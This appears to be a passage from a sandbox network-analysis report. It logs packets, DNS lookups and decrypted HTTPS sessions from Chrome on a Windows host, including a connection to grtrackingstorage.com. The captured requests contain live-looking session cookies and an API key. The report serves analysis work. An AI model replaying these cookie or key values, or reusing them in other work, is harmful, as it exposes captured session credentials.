Jan 17, 2023 14:53:48.645826101 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.649532080 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.649558067 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.649765968 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.649872065 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.649890900 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.650139093 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:48.650161028 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.776161909 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.776496887 CET	443	49714	95.141.32.211	192.168.2.3
Jan 17, 2023 14:53:48.776654005 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:49.914990902 CET	49714	443	192.168.2.3	95.141.32.211
Jan 17, 2023 14:53:49.915024042 CET	443	49714	95.141.32.211	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 17, 2023 14:52:53.981936932 CET	57840	53	192.168.2.3	8.8.8.8
Jan 17, 2023 14:52:53.983058929 CET	52387	53	192.168.2.3	8.8.8.8
Jan 17, 2023 14:52:53.999511957 CET	53	57840	8.8.8.8	192.168.2.3
Jan 17, 2023 14:52:54.010870934 CET	53	52387	8.8.8.8	192.168.2.3
Jan 17, 2023 14:53:00.637427092 CET	49302	53	192.168.2.3	8.8.8.8
Jan 17, 2023 14:53:00.656924963 CET	53	49302	8.8.8.8	192.168.2.3
Jan 17, 2023 14:53:48.571482897 CET	57704	53	192.168.2.3	8.8.8.8
Jan 17, 2023 14:53:48.591067076 CET	53	57704	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 17, 2023 14:52:53.981936932 CET	192.168.2.3	8.8.8.8	0x9bb6	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:52:53.983058929 CET	192.168.2.3	8.8.8.8	0x829c	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:53:00.637427092 CET	192.168.2.3	8.8.8.8	0xf3e0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:53:48.571482897 CET	192.168.2.3	8.8.8.8	0x4c9e	Standard query (0)	grtrackingstorage.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 17, 2023 14:52:53.999511957 CET	8.8.8.8	192.168.2.3	0x9bb6	No error (0)	accounts.google.com		142.250.180.173	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:52:54.010870934 CET	8.8.8.8	192.168.2.3	0x829c	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 17, 2023 14:52:54.010870934 CET	8.8.8.8	192.168.2.3	0x829c	No error (0)	clients.l.google.com		142.250.184.46	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:53:00.656924963 CET	8.8.8.8	192.168.2.3	0xf3e0	No error (0)	www.google.com		142.251.209.36	A (IP address)	IN (0x0001)	false
Jan 17, 2023 14:53:48.591067076 CET	8.8.8.8	192.168.2.3	0x4c9e	No error (0)	grtrackingstorage.com		95.141.32.211	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clients2.google.com

accounts.google.com

www.google.com

grtrackingstorage.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	142.250.184.46	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:52:55 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-104.0.5112.81 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-01-17 13:52:55 UTC	0	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-BCOxXM6E0Zs_EubFKPV_JA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 17 Jan 2023 13:52:55 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5860 X-Daystart: 21175 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-01-17 13:52:55 UTC	1	IN	Data Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 38 36 30 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 31 31 37 35 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5860" elapsed_seconds="21175"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-01-17 13:52:55 UTC	1	IN	Data Raw: 6d 78 76 59 6e 4d 76 4e 7a 49 30 51 55 46 58 4e 56 39 7a 54 32 52 76 64 55 77 79 4d 45 52 45 53 45 5a 47 56 6d 4a 6e 51 51 2f 31 2e 30 2e 30 2e 36 5f 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 Data Ascii: mxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" si
2023-01-17 13:52:55 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49698	142.250.180.173	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:52:55 UTC	2	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:52:55 UTC	3	OUT	Data Raw: 20 Data Ascii:
2023-01-17 13:52:55 UTC	3	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 17 Jan 2023 13:52:55 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-u3cJxHArzemgedonvu5-pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version= Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]} Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-01-17 13:52:55 UTC	4	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2023-01-17 13:52:55 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49701	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:01 UTC	4	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wB Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:01 UTC	5	IN	HTTP/1.1 200 OK Date: Tue, 17 Jan 2023 13:53:01 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3cZ3WG0blQxV7HiM86rXSw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: AqRrpS1jM/HOs1rGR0CnXerKEP/QFz7qj9ApDSZqAO+0U+KcT/h/lxA6akW4ar0kT0V1bw5MD4t8O7L7OFwM5gUAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY3ODIzMzU5OX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-01-17 13:53:01 UTC	7	IN	Data Raw: 65 66 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 63 62 6f 6f 6b 20 70 72 6f 20 61 70 70 6c 65 22 2c 22 64 61 6e 69 6c 6f 20 6e 66 66 63 22 2c 22 65 6c 20 6e 69 6e 6f 20 66 6f 72 65 63 61 73 74 22 2c 22 6e 61 74 75 72 61 6c 20 67 61 73 20 70 72 69 63 65 73 22 2c 22 63 68 69 6e 65 73 65 20 6e 65 77 20 79 65 61 72 20 6d 61 6e 63 68 65 73 74 65 72 22 2c 22 6d 69 64 64 6c 65 73 62 72 6f 75 67 68 22 2c 22 6c 61 73 74 20 77 69 6e 74 65 72 20 6c 6f 76 65 20 69 73 6c 61 6e 64 22 2c 22 6d 6f 72 74 67 61 67 65 20 72 61 74 65 73 20 75 6b 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 Data Ascii: eff)]}'["",["macbook pro apple","danilo nffc","el nino forecast","natural gas prices","chinese new year manchester","middlesbrough","last winter love island","mortgage rates uk"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":fals
2023-01-17 13:53:01 UTC	8	IN	Data Raw: 64 73 4b 7a 65 42 51 2b 53 49 55 77 38 67 69 39 31 55 4d 68 6b 54 67 5a 50 35 30 63 78 77 51 43 70 4b 4b 31 6f 2f 6f 74 2f 6a 45 43 76 30 30 2b 2b 6b 39 33 55 56 6a 6f 41 4c 59 74 4f 33 46 38 64 48 4a 79 64 42 79 4c 6a 54 51 72 76 5a 73 49 6b 2b 51 67 41 72 38 75 50 48 73 4c 65 38 78 55 4b 67 73 44 54 50 55 79 6e 4c 32 2b 2b 76 43 79 59 42 76 46 6c 78 33 56 78 38 4a 74 42 48 35 65 58 62 42 2f 43 62 6a 66 6b 33 4e 2f 44 55 4c 73 65 4e 62 31 34 41 4b 30 61 54 39 74 62 46 57 66 71 39 63 52 2b 45 33 36 75 38 2f 78 65 57 71 31 43 4c 37 51 78 45 4d 41 70 37 43 34 57 73 48 4a 52 6e 57 52 50 6f 2f 41 6e 65 4c 49 67 30 4f 58 4c 46 5a 70 7a 58 4f 7a 2f 58 54 38 35 4d 46 4e 47 39 6a 70 35 51 74 64 61 2f 49 76 78 5a 73 49 48 4b 56 50 67 77 71 7a 4b 4b 77 71 2f 5a 45 Data Ascii: dsKzeBQ+SIUw8gi91UMhkTgZP50cxwQCpKK1o/ot/jECv00++k93UVjoALYtO3F8dHJydByLjTQrvZsIk+QgAr8uPHsLe8xUKgsDTPUynL2++vCyYBvFlx3Vx8JtBH5eXbB/Cbjfk3N/DULseNb14AK0aT9tbFWfq9cR+E36u8/xeWq1CL7QxEMAp7C4WsHJRnWRPo/AneLIg0OXLFZpzXOz/XT85MFNG9jp5Qtda/IvxZsIHKVPgwqzKKwq/ZE
2023-01-17 13:53:01 UTC	10	IN	Data Raw: 75 4c 61 6f 58 32 56 4f 75 34 42 76 4e 2f 74 6f 54 78 67 77 56 6f 64 76 6b 5a 32 61 46 77 33 36 61 4f 77 55 36 78 4d 45 31 69 56 33 69 53 73 6e 7a 36 34 74 4b 36 69 74 72 34 32 47 71 63 6e 46 37 6e 69 71 68 57 69 38 49 54 73 38 4b 6e 64 64 7a 66 47 32 32 37 38 77 4e 43 32 38 53 37 52 7a 7a 35 7a 58 51 75 79 73 31 4d 73 4e 68 76 46 48 36 4b 49 50 65 75 36 53 75 69 53 71 76 4d 79 49 59 7a 2f 45 34 77 53 4f 30 79 58 62 48 75 39 51 67 6d 55 63 66 53 34 31 47 36 51 50 69 5a 63 54 4d 6b 44 59 31 53 67 70 31 67 77 2b 71 67 32 73 4f 32 69 6d 2b 77 54 73 63 49 76 6c 39 4d 48 68 48 38 6a 66 2f 6e 4b 62 75 5a 4c 47 4b 6e 42 70 47 4f 47 7a 56 4d 4e 69 56 57 6a 44 55 41 79 51 35 53 70 74 4c 73 76 52 72 6d 50 51 6e 55 33 48 74 72 7a 64 53 35 4d 2f 66 56 4d 6c 59 34 79 Data Ascii: uLaoX2VOu4BvN/toTxgwVodvkZ2aFw36aOwU6xME1iV3iSsnz64tK6itr42GqcnF7niqhWi8ITs8KnddzfG2278wNC28S7Rzz5zXQuys1MsNhvFH6KIPeu6SuiSqvMyIYz/E4wSO0yXbHu9QgmUcfS41G6QPiZcTMkDY1Sgp1gw+qg2sO2im+wTscIvl9MHhH8jf/nKbuZLGKnBpGOGzVMNiVWjDUAyQ5SptLsvRrmPQnU3HtrzdS5M/fVMlY4y
2023-01-17 13:53:01 UTC	11	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49703	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:08 UTC	11	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wB Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:08 UTC	15	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRUETQFGMTQmp4GIjCnQ9-vGhmjishfoWklr8b83BQV6bmHbjAWW2mvQim2K16slZ0NS8RCmnMwyf1ZJ6EyAXI x-hallmonitor-challenge: CgwIxNCangYQ897MugISBFQRNAU Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Permissions-Policy: unload=() Origin-Trial: AqRrpS1jM/HOs1rGR0CnXerKEP/QFz7qj9ApDSZqAO+0U+KcT/h/lxA6akW4ar0kT0V1bw5MD4t8O7L7OFwM5gUAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY3ODIzMzU5OX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Tue, 17 Jan 2023 13:53:08 GMT Server: gws Content-Length: 418 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: __Secure-ENID=9.SE=gGBHtmccYoVTOetw9mPb0IaZASwGaClMYWbR37btVH0AFORZw2ceTHxUiUifPbVlvMu0vvrDYzj_NR809HY6azvN_GxraUMtv9P6iUZzZs_u9B5N5zRUnOd1CRbb-7hoxMaA2KTshzm8HVHCDyLu0qqIUkMi7bZ1Hdq-SG8R5ho; expires=Sat, 17-Feb-2024 06:11:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: CONSENT=PENDING+846; expires=Thu, 16-Jan-2025 13:53:08 GMT; path=/; domain=.google.com; Secure Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2023-01-17 13:53:08 UTC	16	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49704	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:08 UTC	11	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:08 UTC	12	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRUETQFGMTQmp4GIjA_FxiLdIvCSr2pjYo_QcG2-J_xO8wnmrWG8LfU3EK50P7zj9NvetqCss--zsX0VaYyAXI x-hallmonitor-challenge: CgwIxNCangYQ56W2gAISBFQRNAU Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Permissions-Policy: unload=() Origin-Trial: AqRrpS1jM/HOs1rGR0CnXerKEP/QFz7qj9ApDSZqAO+0U+KcT/h/lxA6akW4ar0kT0V1bw5MD4t8O7L7OFwM5gUAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY3ODIzMzU5OX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Tue, 17 Jan 2023 13:53:08 GMT Server: gws Content-Length: 387 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: __Secure-ENID=9.SE=BY_TCOEI3wCbrG6HJn1uiDWDimtn6OVtvUnVTUmwNhsUDIkaQC-uI3LCFRpvk_uOdtmqS4qDaEhgR3aQGq70rogpyHd89ovKYy4eJzfGkWby9VNFDTwDDHcwOP0j_sCQPAvaK2roF7cAh4C96twVZRfgqg0bOy1eB5ikgxPzEz4; expires=Sat, 17-Feb-2024 06:11:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: CONSENT=PENDING+244; expires=Thu, 16-Jan-2025 13:53:08 GMT; path=/; domain=.google.com; Secure Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
